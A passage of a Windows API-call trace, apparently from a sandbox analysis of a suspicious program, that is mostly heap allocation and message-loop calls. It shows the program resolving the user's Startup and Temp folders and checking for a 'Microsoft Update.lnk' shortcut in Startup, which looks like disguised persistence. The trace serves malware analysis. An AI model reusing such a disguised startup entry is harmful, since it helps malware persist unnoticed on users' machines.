hHeap=0x2af0000) returned 1 [0255.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865b08 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0255.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865040 | out: hHeap=0x2af0000) returned 1 [0255.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0255.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0255.054] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0255.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0255.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0255.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0255.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0255.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0255.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0255.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0255.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0255.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0255.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0255.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0255.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0255.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0255.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0255.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0255.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865b08 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0255.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0255.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0255.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0255.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0255.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0255.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0255.057] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0255.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0255.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0255.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0255.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0255.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0255.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0255.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0255.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0255.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0255.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0255.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0255.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0255.058] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0255.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0255.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0255.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5a8 [0255.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0255.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0255.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab668 [0255.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0255.058] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0255.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0255.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0255.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0255.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0255.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0255.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0255.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0255.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0255.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0255.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0255.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0255.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0255.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0255.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0255.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0255.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0255.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0255.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0255.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0255.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0255.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0255.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0255.059] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0255.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0255.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0255.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0255.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0255.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0255.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0255.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0255.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0255.060] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0255.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0255.060] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0255.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0255.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0255.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0255.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0255.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0255.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0255.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0255.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0255.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0255.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0255.060] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0255.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0255.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0255.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0255.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0255.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0255.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0255.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0255.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0255.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0255.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0255.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0255.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0255.061] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0255.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0255.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0255.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5a8 [0255.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0255.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0255.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0255.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0255.061] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0255.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0255.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb318 [0255.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0255.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0255.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0255.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0255.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0255.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0255.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0255.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0255.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0255.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0255.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0255.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0255.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0255.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0255.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0255.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb318 | out: hHeap=0x2af0000) returned 1 [0255.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0255.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0255.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0255.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0255.062] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0255.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0255.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0255.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0255.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0255.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0255.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0255.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0255.062] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0255.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0255.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0255.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0255.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0255.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0255.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0255.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0255.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0255.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0255.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0255.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0255.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0255.063] timeGetTime () returned 0x117f9b0 [0255.063] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.063] Sleep (dwMilliseconds=0xa) [0255.097] timeGetTime () returned 0x117f9de [0255.097] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.097] Sleep (dwMilliseconds=0xa) [0255.144] timeGetTime () returned 0x117fa0d [0255.144] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.144] Sleep (dwMilliseconds=0xa) [0255.179] timeGetTime () returned 0x117fa2d [0255.179] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.180] Sleep (dwMilliseconds=0xa) [0255.219] timeGetTime () returned 0x117fa4c [0255.219] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.219] Sleep (dwMilliseconds=0xa) [0255.238] timeGetTime () returned 0x117fa6b [0255.238] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.238] Sleep (dwMilliseconds=0xa) [0255.257] timeGetTime () returned 0x117fa7b [0255.257] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.257] Sleep (dwMilliseconds=0xa) [0255.269] timeGetTime () returned 0x117fa8a [0255.269] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.269] Sleep (dwMilliseconds=0xa) [0255.299] timeGetTime () returned 0x117fa9a [0255.299] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0255.299] TranslateMessage (lpMsg=0x8cf798) returned 0 [0255.299] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0255.299] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0255.299] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0255.299] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.299] Sleep (dwMilliseconds=0xa) [0255.316] timeGetTime () returned 0x117fab9 [0255.316] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.316] Sleep (dwMilliseconds=0xa) [0255.354] timeGetTime () returned 0x117fad8 [0255.354] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.354] Sleep (dwMilliseconds=0xa) [0255.379] timeGetTime () returned 0x117faf8 [0255.379] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.379] Sleep (dwMilliseconds=0xa) [0255.417] timeGetTime () returned 0x117fb17 [0255.417] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.417] Sleep (dwMilliseconds=0xa) [0255.504] timeGetTime () returned 0x117fb75 [0255.504] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.504] Sleep (dwMilliseconds=0xa) [0255.519] timeGetTime () returned 0x117fb84 [0255.519] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.520] Sleep (dwMilliseconds=0xa) [0255.548] timeGetTime () returned 0x117fb94 [0255.548] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 